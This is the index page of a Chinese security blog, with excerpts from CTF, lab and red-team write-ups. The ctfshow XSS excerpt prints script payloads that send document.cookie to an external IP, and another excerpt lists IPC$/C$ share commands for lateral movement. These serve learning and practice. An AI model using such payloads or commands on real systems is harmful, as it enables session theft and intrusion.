avatar
文章
67
标签
28
分类
0

主页
web安全
  • 渗透测试
  • 代码审计
  • 漏洞复现
  • 红蓝对抗
  • java安全
CTF
  • web
  • misc
  • crypto
  • re
友链
留言板
关于笔者
c0ll4r
搜索
主页
web安全
  • 渗透测试
  • 代码审计
  • 漏洞复现
  • 红蓝对抗
  • java安全
CTF
  • web
  • misc
  • crypto
  • re
友链
留言板
关于笔者

c0ll4r

小迪(一)
发表于2024-11-06
background红日的靶场看官方给的wp 基本就是梭哈 原理也不明白 工具其他的使用方式也不清楚 就想着去看看课吧 看小迪的 https://www.bilibili.com/video/BV123yAYMEwb 131大概看了 没啥东西 就是些基础的权限之类的介绍 就不做记录了 132好像也差不多 133 windows提权土豆家族 补丁查询 把systeminfo的内容放到txt里 然后python跑 重点看impact显示elevation of privilege(权限提升) https://mp.weixin.qq.com/s/OW4ybuqtErh_ovkTWLSr8w https://github.com/bitsadmin/wesng windows下数据库提权
awd展示平台
发表于2024-11-05
background就是有炫酷的大屏 给领导看的 一直搭建在vps上 但是这东西要传承 直接做虚拟机系统吧 环境准备centos7的系统 备份源 cp -rp /etc/yum.repos.d/ /etc/yum.repos.d_back 下载 wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.cloud.tencent.com/repo/centos7_base.repowget -O /etc/yum.repos.d/epel.repo http://mirrors.cloud.tencent.com/repo/epel-7.repo 更新 yum clean allyum makecache 关闭防火墙 systemctl stop firewalldsystemctl disable firewalld 设置自动同步时间 yum -y install ntp ntpdateln -sf /usr/share/zoneinfo/Asia/Shanghai /etc/localtimentpdat ...
红日靶场2
发表于2024-11-04
background看了官网放的红日一解 感觉之前自己做的太浅了 网上很多文章也是很浅 参考https://mp.weixin.qq.com/s/A3MIuT7RXTIIPNLjF42OTg 记录下一些内网常用的命令 ipconfig /all # 查看本机ip,所在域route print # 打印路由信息net view # 查看局域网内其他主机名arp -a # 查看arp缓存net start # 查看开启了哪些服务net share # 查看开启了哪些共享net share ipc$ # 开启ipc共享net share c$ # 开启c盘共享net use \\192.168.xx.xx\ipc$ "" /user:"" # 与192.168.xx.xx建立空连接net use \\192.168.xx.xx\c$ "密码" /user:"用户名" # 建立c盘共享dir \\192.168.xx.xx\c$ ...
S8强网杯的一些小记
发表于2024-11-04
background打的稀烂 记录一下我能理解的题 都是些没啥难度的 Givemesecret不回答就一直刷新重新问 xiaohuanxiong/admin/admins即可未授权访问 源码地址 https://gitee.com/haoyuanma/xiaohuanxiong https://github.com/carrot-dog/xiaohuanxiong/ 我用了这两个源码都不存在未授权访问的问题 漏洞版本https://github.com/forkable/xiaohuanxiong/ 搭建参考 我用的宝塔搭建的https://blog.csdn.net/weixin_31040629/article/details/116220194 php7.2 写了伪静态规则 安了redis和php的redis扩展 访问install即可安装 有文章说这里未授权访问的问题是变量重写了 我试着删掉其中一处变量 也还是存在洞 可能是我方法的问题吧 搞不明白这个未授权访问哪来的 至于getshell这里没啥讲的 很基础 snake结束游戏后会显示用户名 &#x ...
ctfshow-xss
发表于2024-11-01
刷一下ctfshow的xss xss-lab就是个热身 自己x自己 https://xz.aliyun.com/t/4067 payload <script>var img=document.createElement("img"); img.src="http://118.31.168.198:39543/"+document.cookie;</script><script>window.open('http://118.31.168.198:39543/'+document.cookie)</script><script>location.href='http://118.31.168.198:39543/'+document.cookie</script><script>window.location.href='http://118.31.168.198:39543/'+document.cook ...
xss-lab
发表于2024-10-30
background:昨天看了下网鼎杯 自己挺菜的 没做出来啥题 我一直也没想着往ctf方面深入 学了点简单无脑的东西 知识储备量也不够 ctf这玩意 知识储备很重要 这一两年也算是在一线rt的队伍里(小地方) rt打到现在我不想打了 感觉学不到上面东西 无非就是那点东西 信息搜集 打点 隧道 横向 用着别人的day 自己真的任何提升都没有 目前我的所有事情已经告一段落了 升学的事情基本是稳了的 今天早上本来是想打算过一遍ruoyi的 想多学学实战的东西 前段时间是计划着过红日靶场 我做完了1 感觉其实真的没啥大的提升 脚本小子罢了 百度看看了下xss的教程 看到t4哥的先知了 他真的好厉害啊 ciscn总决赛的题都参考了他的文章(也可能是同时发现的) 既然rt不想搞 只能搞ctf了 升本之后有大把的时间 包括现在我还有大半年 加油吧 希望能在知识上有所提高 先从xss-lab看起 docker没了真的蛋疼啊 最后搞了个hk的机子 xss-lab镜像vulfocus/xss-labs 用这个经典的靶场 level1 直接打直接弹窗 http://8.210.90.129 ...
win11右键风格变win10
发表于2024-10-29
background现在的电脑买来都是win11了 虽然我喜欢用win10 但是新机到手是win11 我也不好给他装成win10了 win11的右键很奇怪 要点击“更多选项”才能执行其他操作 很不方便 我以为这是系统特性改不了了 其实是可以改的 参考https://baijiahao.baidu.com/s?id=1799217797207316270&wfr=spider&for=pc 开启旧版右键菜单:reg add "HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32" /f /ve恢复windows11新版右键菜单:reg delete "HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}" /f
红日靶场1
发表于2024-10-01
background新电脑配置的差不多了 也不知干什么 然后就是想学习一下常见Java类漏洞的打法 结果docker现在这种情况 真的是无语死了 然后就学学内网吧 搭建参考 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 打点我也尽量黑盒自己去做 不看wp 靶机配置没做什么说明 那就直接三个全开 对着本机c段扫 发现貌似不行 这三个都是默认nat的 参考https://blog.csdn.net/m0_75178803/article/details/136015522 win7双网卡 通本机 win2008,win2k3都接在1交换机上 fscan是真的动不了 goby发现了存活扫不动 后来另一篇文章说要进win7手启phpstudy 登录的时候如果要修改密码 删了虚拟机镜像重新解压再启动 启动不了就重启 要是没网络就新增一个网卡 反正这玩意玄乎的很 启动之后fscan就能扫到了 这里也禁ping了 访问80端口是一个小皮的页面 测了下mysql是root root 开了3306但是上不去 扫了下路径发现有货 ...
那年那月那时
发表于2024-09-30
background那年 我17 因为热爱与梦想 我去了某个比赛 认识了后面一直在指引我的t4哥 那年10月 我睡在黄浦江边的长凳上 江风刺骨 四年后 我谈了恋爱 有了些收入 也不再像当时那样落魄 拿起当年的玩具 思绪又回到了当年 买了个新壳子 内存卡现在也是真便宜 上了个64gb的 安装这玩意就跟电脑一样的 https://shumeipai.nxez.com/download#os 安装专门的烧录软件Raspberry Pi Imager(以前没用过 这个可以在烧录系统的时候就修改一些设置 很方便) 安装系统 https://downloads.raspberrypi.org/raspios_arm64_latest 烧录即可 选择支持ssh 配置好热点信息 ssh上去即可 换源 sed -i 's/deb.debian.org/mirrors.aliyun.com/g' /etc/apt/sources.listsed -i 's/security.debian.org/mirrors.aliyun.com/g' /etc/apt ...
记一次特别重大成果
发表于2024-09-22
background一次地区的hw 规模很小 记录一下主要是这个洞利用起来有点意思 再有就是 这是我hw这么久以来打出的最具有价值的漏洞 几千万的数据 离谱到啥程度呢 直接在里面给我对象奶奶的三要素给查出来了 打点开局是很朴实无华的弱口令 进的后台 a.com 抓包发现数据是从b.com拉取过来的 后面发现其实cookie也是b.com下发的 直接访问b.com 403 带路径访问也是403 但是我发现路径里有geoserver 于是测一下geoserver的poc 没反应 就没去管了 POST /geoserver/wms HTTP/1.1Content-Type: application/xmlAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateHost: xxx.xxx.xxx.xxxCo ...
1234…7
avatar
c0ll4r
文章
67
标签
28
分类
0
公告
Email:root@pwns.fun
最新文章
第21届湖南省大学生计算机程序设计竞赛网络安全赛2025-10-14
win下redis写jsp的shell2025-07-23
ctfshow终极考核2025-06-28
上帝给你关了一扇门,他会打开一扇窗2025-05-01
红日32025-03-10
标签
xss ssti springboot 攻防演练 ssrf awd 内网 rce 代码审计 crypto python vulhub 文件包含 jwt 碎碎念 C 内网渗透 other nodejs sql注入 ctf 权限提升 渗透测试 java安全 漏洞复现 poc d web
归档
  • 十月 20251
  • 七月 20251
  • 六月 20251
  • 五月 20251
  • 三月 20251
  • 二月 20255
  • 一月 20251
  • 十二月 20247
网站资讯
文章数目 :
67
本站总字数 :
83.2k
最后更新时间 :
©2020 - 2025 By c0ll4r
框架 Hexo|主题 Butterfly
湘ICP备2023001513号 湘公网安备 43310102000328号
搜索
数据库加载中